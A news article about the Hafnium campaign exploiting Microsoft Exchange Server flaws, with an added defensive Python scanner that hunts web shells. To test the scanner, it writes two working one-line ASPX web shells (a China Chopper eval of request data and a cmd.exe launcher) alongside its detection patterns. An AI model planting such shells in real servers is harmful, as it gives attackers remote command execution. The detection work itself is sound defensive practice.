At least 30,000 U.S. organizations are victims of an unusually aggressive Chinese cyber-espionage unit exploiting vulnerabilities in Microsoft Exchange Server mail software.
The previously unknown state-sponsored Chinese hackers, identified as “Hafnium”, were exploiting four vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065), whose discovery was credited to the Virginia-based cybersecurity firm Volexity.
The researchers found that the Chinese hackers had been silently exploiting the bugs since at least January 6, 2021. Although Microsoft released an emergency patch to prevent further exploitation, evicting a persistent threat actor was difficult: the patch closes the vulnerabilities but does not remove web shells or other access the attackers had already established.
Chinese hackers escalated the cyber espionage campaign to target more organizations
Microsoft earlier said that the threat actors targeted email systems used by infectious disease researchers, law firms, NGOs, defense contractors, higher education institutions, and policy think tanks.
However, cybersecurity experts discovered that the Chinese hackers escalated their cyber-espionage campaign by scanning the internet for vulnerable and unpatched MS Exchange servers online.
Anonymous sources in contact with U.S. national security advisors told KrebsOnSecurity that Chinese hackers had already seized hundreds of thousands of Exchange mail servers globally. The Chinese hackers left indicators of compromise (IoCs), including an internet-reachable, password-protected web shell on each compromised email server.
Microsoft released a statement indicating that it was working with government agencies, including the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (DHS-CISA), and other security agencies to address the threat. CISA directed all federal agencies using Microsoft Exchange email servers to update them or disconnect them from federal networks.
White House press secretary Jen Psaki noted that the Chinese hackers posed a significant threat, and the cyber espionage campaign could have far-reaching effects. She added that the “large number of victims” compromised by the cyber espionage campaign was worrying.
Former CISA director Chris Krebs noted that more victims were likely. An anonymous source who spoke to KrebsOnSecurity said that the cleanup process involving tens of thousands of victims would not be enormous. National Security Adviser Jake Sullivan said the White House was “closely tracking” the cyber espionage campaign for potentially compromising defense industrial base entities.
Other security researchers, including Microsoft’s Kevin Beaumont, released tools for detecting hackers’ activities on compromised servers.
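As an added illustration of the kind of check those tools perform (this is example code, not Microsoft’s or Kevin Beaumont’s tooling), the script below hunts for the password-protected web shells described above by walking the web-facing directories of an Exchange server and flagging ASP.NET files whose content evaluates request data or spawns processes. The directory list and the content heuristics are assumptions drawn from public incident guidance, not from this article; the sample tree it builds is constructed, with one benign logon page beside two China Chopper style shells.

```python
"""Web shell hunt for Exchange web-facing directories (added example, not vendor tooling)."""
import os
import re
import tempfile
from pathlib import Path

# Drop sites commonly reported for Hafnium web shells. Assumption: treat this
# list as a starting point and verify it against current vendor guidance.
EXCHANGE_WEB_DIRS = [
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth",
]

# ASP.NET file types a one-file shell is usually written as.
WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asax", ".ascx"}

# Content heuristics for one-liner shells: eval() of request data (the
# China Chopper pattern), the "unsafe" eval flag, or direct process creation.
SHELL_PATTERNS = {
    "eval-of-request": re.compile(
        r"eval\s*\(\s*Request(\.(Item|Form|QueryString|Params))?\s*\[", re.I),
    "unsafe-eval": re.compile(r'"unsafe"\s*\)', re.I),
    "process-start": re.compile(
        r"Process\.Start\s*\(|System\.Diagnostics\.Process", re.I),
}


def classify(content: str) -> list[str]:
    """Return the names of the shell patterns that match the file content."""
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(content)]


def scan_tree(root) -> list[dict]:
    """Walk a directory tree and report web files that look like shells."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = classify(text)
        if hits:
            st = path.stat()
            findings.append({"path": str(path), "patterns": hits,
                             "size": st.st_size, "mtime": st.st_mtime})
    return findings


def build_sample_tree() -> str:
    """Constructed sample tree: a benign logon page next to two shells."""
    root = tempfile.mkdtemp(prefix="exchange-sample-")
    auth = Path(root, "FrontEnd", "HttpProxy", "owa", "auth")
    auth.mkdir(parents=True)
    # Benign page: markup only, no server-side evaluation of request data.
    (auth / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n<form method="post"><input name="username"></form>\n')
    # China Chopper style shell: eval() of a password-named request parameter.
    (auth / "help.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>\n')
    client = Path(root, "aspnet_client", "system_web")
    client.mkdir(parents=True)
    # Command shell: spawns cmd.exe with an attacker-supplied argument.
    (client / "cmd.aspx").write_text(
        '<script runat="server">void Page_Load(){ '
        'System.Diagnostics.Process.Start("cmd.exe", Request["c"]); }</script>\n')
    return root


if __name__ == "__main__":
    # On a real server, replace build_sample_tree() with the EXCHANGE_WEB_DIRS
    # entries; here we scan the constructed sample so the script runs anywhere.
    for finding in scan_tree(build_sample_tree()):
        print(finding["path"], finding["patterns"])
```

A hit is a lead, not a verdict: review each flagged file, its modification time and the IIS request logs for that path, and remember that a file landing in `aspnet_client` at all is itself unusual on a stock Exchange install.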
European Union banking regulator’s email servers breached by Chinese hackers
Other entities outside the United States have also acknowledged being victims of the Chinese hackers’ cyber espionage campaign. The European Banking Authority (EBA) admitted that it was the subject of a cyber-attack against its Microsoft Exchange Servers.
The regulator said that because the vulnerability affected the “EBA’s email servers, access to personal data through emails held on those servers may have been obtained by the attacker.”
EBA disclosed that it took its email systems offline as a precautionary measure but was working to restore full functionality of its systems.
Several hours later, the European Union body released a statement explaining that “no data extraction has been performed and we have no indication to think that the breach has gone beyond our email servers.”
“The exploitation of the 0days in question required some specific conditions (e.g. user account on the vulnerable system) and thus raises questions about what exactly happened at EBA,” wonders Ilia Kolochenko, CEO at ImmuniWeb. “Another key question is when exactly EBA was compromised. If the intrusion had happened prior to the public disclosure of the vulnerability, it was just possible to do some system hardening and continuous monitoring for network anomalies – to prevent 0day exploitation – or at least to detect it in a timely manner.”
Kolochenko noted that EBA would hardly be the only public agency affected by the cyber espionage campaign, as more public authorities would discover that they had been victims of exploitation through vulnerable Microsoft Exchange servers. He therefore underscored the need for a proper technical investigation before attributing an attack.
It’s also probable that the Chinese hackers will expand their attack vectors, while other threat actors will exploit the vulnerability to install backdoors for delivering malware and ransomware.
Microsoft executive Tom Burt already predicted that other nation-state actors and criminal groups would rush to exploit the vulnerability.
“It is, unfortunately, no surprise that the scope of the recent Microsoft Exchange exploit has continued to grow substantially,” says Saryu Nayyar, CEO, Gurucul. “While there are still thousands of organizations worldwide that operate an on-premises instance of Exchange, the painful truth is that many of those users lack the resources to properly protect or maintain them.”
Nayyar added that the compromise was one of those “Stop what you are doing and fix this now!” events and that organizations had no choice but to patch their systems.
“Perhaps worse, even for organizations that have recently patched, there will be a period of uncertainty while they confirm their system wasn’t compromised or scrub their own environment to find anything an attacker may have done if it was.”
Bryson Bort, CEO of SCYTHE says that organizations must implement defensive and offensive security measures and adopt the “assume you’ve been breached model.”
“No matter how an attacker gets in, they have to be visible afterward; it’s a question of whether you’ve got resources that are good enough to see it,” Bort concluded.